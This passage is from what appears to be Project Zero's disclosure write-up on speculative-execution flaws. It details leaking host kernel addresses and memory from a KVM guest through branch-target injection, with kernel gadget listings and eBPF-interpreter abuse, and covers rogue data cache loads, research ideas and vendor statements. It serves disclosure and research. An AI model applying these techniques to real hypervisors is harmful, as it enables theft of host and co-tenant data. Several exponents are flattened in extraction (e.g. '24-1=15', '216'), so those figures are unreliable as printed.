With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.

Reading host memory from a KVM guest

Locating the host kernel

Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

 

  • lower 20 bits of the address of kvm-intel.ko
  • full address of kvm.ko
  • full address of vmlinux

 

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

 

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

 

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section «Reverse-Engineering Branch Predictor Internals», using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

 

 

 

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) — by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

 

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

 

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section «Generic Predictor» apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.

 

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.

 

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux  are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won’t actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

 

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.

Identifying cache sets

The PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they’re probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].

Locating the host-virtual address of a guest page

Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

 

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used — R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

 

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

 

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

 

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

 

To brute-force the physical address, the following gadget can be used:

 

ffffffff810a9def:       4c 89 c0                mov    rax,r8
ffffffff810a9df2:       4d 63 f9                movsxd r15,r9d
ffffffff810a9df5:       4e 8b 04 fd c0 b3 a6    mov    r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc:       81
ffffffff810a9dfd:       4a 8d 3c 00             lea    rdi,[rax+r8*1]
ffffffff810a9e01:       4d 8b a4 00 f8 00 00    mov    r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08:       00

 

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 — the physical address guess minus 0xf8 — is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.

Cache set selection

To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.

Leaking data

At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel — while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel’s text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

 

The eBPF interpreter entry point has the following function signature:

 

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

 

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed — which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn’t matter.

 

The eBPF interpreter provides, among other things:

 

  • multiple emulated 64-bit registers
  • 64-bit immediate writes to emulated registers
  • memory reads from addresses stored in emulated registers
  • bitwise operations (including bit shifts) and arithmetic operations

 

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

 

ffffffff81514edd:       4c 89 ce                mov    rsi,r9
ffffffff81514ee0:       41 ff 90 b0 00 00 00    call   QWORD PTR [r8+0xb0]

 

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.

Variant 3: Rogue data cache load

 

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

 

We do have a few additions to make to Anders Fogh’s blogpost:

 

«Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, […]»

 

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

 

«First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1.»

 

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

 

«Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed.»

 

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.

Ideas for further research

We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost — it contains untested ideas that might well be useless.

Leaking without data cache timing

It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.

Other microarchitectures

Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.

Other JIT engines

We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical — in particular, JavaScript engines.

More efficient scanning for host-virtual addresses and cache sets

In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

 

The same might work for cache sets — use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.

Dumping the complete BTB state

Given that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

 

The source address aliasing would reduce the usefulness somewhat, but because target addresses don’t suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

 

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.

Variant 2: Leaking with more efficient gadgets

If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.

Various speedups

In particular the variant 2 PoC is still a bit slow. This is probably partly because:

 

  • It only leaks one bit at a time; leaking more bits at a time should be doable.
  • It heavily uses IRETQ for hiding control flow from the processor.

 

It would be interesting to see what data leak rate can be achieved using variant 2.

Leaking or injection through the return predictor

If the return predictor also doesn’t lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn’t reloaded before the return instruction).

 

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.

Leaking data out of the indirect call predictor

We have attempted to leak target information out of the indirect call predictor, but haven’t been able to make it work.

Vendor statements

The following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:

Intel

Intel is committed to improving the overall security of computer systems. The methods described here rely on common properties of modern microprocessors. Thus, susceptibility to these methods is not limited to Intel processors, nor does it mean that a processor is working outside its intended functional specification. Intel is working closely with our ecosystem partners, as well as with other silicon vendors whose processors are affected, to design and distribute both software and hardware mitigations for these methods.

For more information and links to useful resources, visit:

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00088&languageid=en-fr
http://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf

AMD

ARM

Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

 

Specific details regarding the affected processors and mitigations can be found at this website:https://developer.arm.com/support/security-update

 

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.

Literature

Note that some of these documents — in particular Intel’s documentation — change over time, so quotes from and references to it may not reflect the latest version of Intel’s documentation.

 

  • https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel’s optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
    • «Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems.»
    • «Loads can:[…]Be carried out speculatively, before preceding branches are resolved.»
    • «Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition.»
    • «if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches»
    • «Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch).»
  • https://software.intel.com/en-us/articles/intel-sdm: Intel’s Software Developer Manuals
  • http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog’s documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
  • http://www.cs.binghamton.edu/~dima/micro16.pdf and https://github.com/felixwilhelm/mario_baslr: Prior research by Dmitry Evtyushkin, Dmitry Ponomarev and Nael Abu-Ghazaleh on abusing branch target buffer behavior to leak addresses that we used as a starting point for analyzing the branch prediction of Haswell processors. Felix Wilhelm’s research based on this provided the basic idea behind variant 2.
  • https://arxiv.org/pdf/1507.06955.pdf: The rowhammer.js research by Daniel Gruss, Clémentine Maurice and Stefan Mangard contains information about L3 cache eviction patterns that we reused in the KVM PoC to evict a function pointer.
  • https://xania.org/201602/bpu-part-one: Matt Godbolt blogged about reverse-engineering the structure of the branch predictor on Intel processors.
  • https://www.sophia.re/thesis.pdf: Sophia D’Antoine wrote a thesis that shows that opcode scheduling can theoretically be used to transmit data between hyperthreads.
  • https://gruss.cc/files/kaiser.pdf: Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, and Stefan Mangard wrote a paper on mitigating microarchitectural issues caused by pagetable sharing between userspace and the kernel.
  • https://www.jilp.org/: This journal contains many articles on branch prediction.
  • http://blog.stuffedcow.net/2013/01/ivb-cache-replacement/: This blogpost by Henry Wong investigates the L3 cache replacement policy used by Intel’s Ivy Bridge architecture.

References

[1] This initial report did not contain any information about variant 3. We had discussed whether direct reads from kernel memory could work, but thought that it was unlikely. We later tested and reported variant 3 prior to the publication of Anders Fogh’s work at https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/.
[2] The precise model names are listed in the section «Tested Processors». The code for reproducing this is in the writeup_files.tar archive in our bugtracker, in the folders userland_test_x86 and userland_test_aarch64.
[3] The attacker-controlled offset used to perform an out-of-bounds access on an array by this PoC is a 32-bit value, limiting the accessible addresses to a 4GiB window in the kernel heap area.
[4] This PoC won’t work on CPUs with SMAP support; however, that is not a fundamental limitation.
[5] linux-image-4.9.0-3-amd64 at version 4.9.30-2+deb9u2 (available athttp://snapshot.debian.org/archive/debian/20170701T224614Z/pool/main/l/linux/linux-image-4.9.0-3-amd64_4.9.30-2%2Bdeb9u2_amd64.deb, sha256 5f950b26aa7746d75ecb8508cc7dab19b3381c9451ee044cd2edfd6f5efff1f8, signed via Release.gpgReleasePackages.xz); that was the current distro kernel version when I set up the machine. It is very unlikely that the PoC works with other kernel versions without changes; it contains a number of hardcoded addresses/offsets.
[6] The phone was running an Android build from May 2017.
[9] More than 215 mappings would be more efficient, but the kernel places a hard cap of 216 on the number of VMAs that a process can have.
[10] Intel’s optimization manual states that «In the first implementation of HT Technology, the physical execution resources are shared and the architecture state is duplicated for each logical processor», so it would be plausible for predictor state to be shared. While predictor state could be tagged by logical core, that would likely reduce performance for multithreaded processes, so it doesn’t seem likely.
[11] In case the history buffer was a bit bigger than we had measured, we added some margin — in particular because we had seen slightly different history buffer lengths in different experiments, and because 26 isn’t a very round number.
[12] The basic idea comes from http://palms.ee.princeton.edu/system/files/SP_vfinal.pdf, section IV, although the authors of that paper still used hugepages.